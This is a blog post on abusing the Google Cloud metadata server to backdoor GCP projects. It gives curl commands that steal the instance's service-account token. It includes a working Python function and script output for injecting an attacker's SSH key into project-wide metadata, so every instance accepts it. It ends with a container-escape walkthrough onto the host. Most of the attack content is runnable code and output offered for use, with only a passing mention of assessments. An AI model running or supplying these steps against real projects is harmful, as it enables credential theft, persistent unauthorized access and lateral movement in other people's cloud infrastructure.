Abusing Cloud APIs to Backdoor GCP Projects

Introduction

GCP, or Google Cloud Platform, is Google’s suite of cloud services. You can use it to run your applications in the cloud with services like Compute Engine, Cloud Functions, BigQuery, and so on. Google itself uses it to power some of its own applications, like Google Search and YouTube.

In this post I’ll briefly talk about the Cloud API and how certain configurations can let attackers pivot around your infrastructure and even maintain persistence. The only caveat is that the Compute Engine instance you’re launching your attack from needs to have a service account associated with it (the default) and read/write access to the Compute Engine API. It’s a pretty big ask, I know, but considering that one of the two scope presets grants that permission without warning, it’s not unrealistic. Plus, it could be useful if you find yourself in an assessment where this is relevant!

Metadata Endpoints

Many cloud providers expose an internal metadata endpoint, typically assigned a non-publicly-routable IP address. Some metadata endpoints are harmless and just provide useful information about the environment; others let you call dangerous API functions on behalf of the instance you’re on. Here’s a handy list of different cloud providers and the metadata endpoints they have.

SSRF attacks against metadata endpoints aren’t new. Pocket and Qualified have both seen these attacks (luckily as part of their bug bounties!) with potentially devastating impact. It’s worth noting that Google’s endpoint requires you to set a Metadata-Flavor: Google header, which mitigates the typical SSRF scenarios and forces attackers to use an RCE bug instead (as in the case of Qualified).
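
To see that requirement in action, here’s a minimal sketch in Python (assuming the requests library is available) that hits the same metadata path with and without the header:

import requests

BASE = "http://metadata.google.internal/computeMetadata/v1"

# Without the required header, the metadata server refuses the request
# and complains about the missing Metadata-Flavor header.
resp = requests.get(BASE + "/project/project-id")
print(resp.status_code, resp.text)

# With the header, the same request succeeds and returns the project ID.
resp = requests.get(BASE + "/project/project-id", headers={"Metadata-Flavor": "Google"})
print(resp.status_code, resp.text)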

Interacting with the Endpoints

You can pretty much use curl for everything. Reading metadata typically doesn’t require authentication, which can be great if the service you’re dealing with stores sensitive info there.

$ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/attributes/
ssh-keys
$ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys
omar:ssh-rsa AAAAB...vZ3E49 omar
omar:ssh-rsa AAAAB...M2oi7N omar
...
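
Another read worth doing early is the list of OAuth scopes granted to the instance’s default service account, since that’s what decides whether the metadata write we’re building up to will even be allowed. A small sketch, again in Python with requests:

import requests

BASE = "http://metadata.google.internal/computeMetadata/v1"
HEADERS = {"Metadata-Flavor": "Google"}

# The scopes entry is a newline-separated list of OAuth scope URLs.
scopes = requests.get(BASE + "/instance/service-accounts/default/scopes", headers=HEADERS).text.split()

# Full Compute Engine access (or the catch-all cloud-platform scope) is what we need;
# the compute.readonly scope won't let us modify metadata.
if "https://www.googleapis.com/auth/compute" in scopes or "https://www.googleapis.com/auth/cloud-platform" in scopes:
    print("read/write Compute Engine scope available")
else:
    print("no read/write Compute Engine scope, the write below will be denied:", scopes)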

Our goal here is to write our public key to that endpoint. That requires authentication, but that’s not a problem: we can grab an access token from the metadata server and authenticate our API requests by attaching it to them.

$ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.......5gNg3","expires_in":3385,"token_type":"Bearer"}

Now we just need to send it our public keys. The annoying part is that since you’re replacing the contents of this endpoint, you’ll need to retrieve the list of existing public keys (along with the current metadata fingerprint, which the API requires), append yours, and then send the whole thing back.

$ curl -X POST \
-H "Authorization: Bearer ya29.c...." \
-H "Content-Type: application/json" \
-d '{"fingerprint": "current fingerprint", "items": [{"key": "ssh-keys", "value": "existing + new public keys"}]}' \
https://www.googleapis.com/compute/v1/projects/project-name/setCommonInstanceMetadata
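
Since the fingerprint and the existing keys both come out of the project resource, the whole read-modify-write cycle is easier to follow in one place. Here’s a rough Python sketch of it (using requests; the function name add_project_ssh_key is mine, and this is not the script mentioned below):

import requests

METADATA = "http://metadata.google.internal/computeMetadata/v1"
MD_HEADERS = {"Metadata-Flavor": "Google"}
COMPUTE = "https://www.googleapis.com/compute/v1"


def add_project_ssh_key(public_key_line):
    """Append an entry like 'user:ssh-rsa AAAA... user' to the project-wide ssh-keys."""
    # Token and project ID come straight from the metadata server.
    token = requests.get(METADATA + "/instance/service-accounts/default/token",
                         headers=MD_HEADERS).json()["access_token"]
    project = requests.get(METADATA + "/project/project-id", headers=MD_HEADERS).text
    api_headers = {"Authorization": "Bearer " + token, "Content-Type": "application/json"}

    # Read the current common instance metadata; we need the fingerprint and
    # must resend every existing item, since setCommonInstanceMetadata replaces them all.
    metadata = requests.get(f"{COMPUTE}/projects/{project}",
                            headers=api_headers).json()["commonInstanceMetadata"]
    items = metadata.get("items", [])

    # Append our key to the ssh-keys item, creating it if it doesn't exist yet.
    for item in items:
        if item["key"] == "ssh-keys":
            item["value"] = item["value"].rstrip("\n") + "\n" + public_key_line
            break
    else:
        items.append({"key": "ssh-keys", "value": public_key_line})

    # Write the modified metadata back. The API returns a long-running operation;
    # this sketch doesn't bother waiting for it to finish.
    resp = requests.post(f"{COMPUTE}/projects/{project}/setCommonInstanceMetadata",
                         headers=api_headers,
                         json={"fingerprint": metadata["fingerprint"], "items": items})
    resp.raise_for_status()


add_project_ssh_key("omar:ssh-rsa AAAA... omar")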

Once that request goes through, every Compute Engine instance in this project will have your ssh public key on it. In some cases you might want to do this only for the particular instance you’re on instead of the entire project. Luckily that’s not too difficult: you just need to change the endpoint you’re talking to. I’ll cover that at the end.

Putting it Together

While the set of requests we need to make is easy to follow, it’s still easier to automate it all away. I’ve written a Python script that handles this, which you can find here. You just plug in your ssh public key and it’ll try to add it to the current project, saving you the trouble of fingerprinting your API privileges by hand.

$ python add_key_to_project.py "... ssh public key ..."
Got Access Token: XXX...
Got project name: XXX...
Got instance name: XXX...
================================================================================
13 keys for the project
6 keys for the instance
================================================================================
Success!

Bonus: Container Escape

If you find yourself in a container (e.g. Docker) on a Google Compute Engine instance, you can still use the metadata endpoint to escape onto the parent host: the metadata server is just a network service, so it’s reachable from inside the container, and the key you inject gets provisioned on the host itself. You don’t even need to change anything in the script. After adding your ssh key, you can simply ssh to the parent host with the corresponding private key (172.17.0.1 in the example below is the default Docker bridge gateway, i.e. the host), and you’re out! You now have access to all the other containers running on that system.

bash-4.4# python add_key_to_project.py "... ssh public key ..."
Got Access Token: XXX...
Got project name: XXX...
Got instance name: XXX...
================================================================================
13 keys for the project
6 keys for the instance
================================================================================
Success!

bash-4.4# ssh -i backdoor.key omar@172.17.0.1
Linux instance-1 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

omar@instance-1:~$ sudo docker ps # parent host!
CONTAINER ID        IMAGE               COMMAND
fc1b2d9a8dd9        bash:4.4            "docker-entrypoint..."